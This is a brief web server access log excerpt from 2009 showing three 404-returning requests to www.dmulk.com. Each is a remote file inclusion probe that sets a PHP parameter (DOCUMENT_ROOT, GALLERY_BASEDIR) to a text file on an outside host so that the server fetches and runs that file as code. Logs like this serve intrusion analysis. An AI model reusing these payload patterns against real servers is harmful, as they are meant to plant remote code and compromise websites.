77.221.130.2 - - [16/Sep/2009:10:54:48 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:54:49 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.101.229 - - [16/Sep/2009:10:55:11 -0700] "GET /logs/access_080214.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
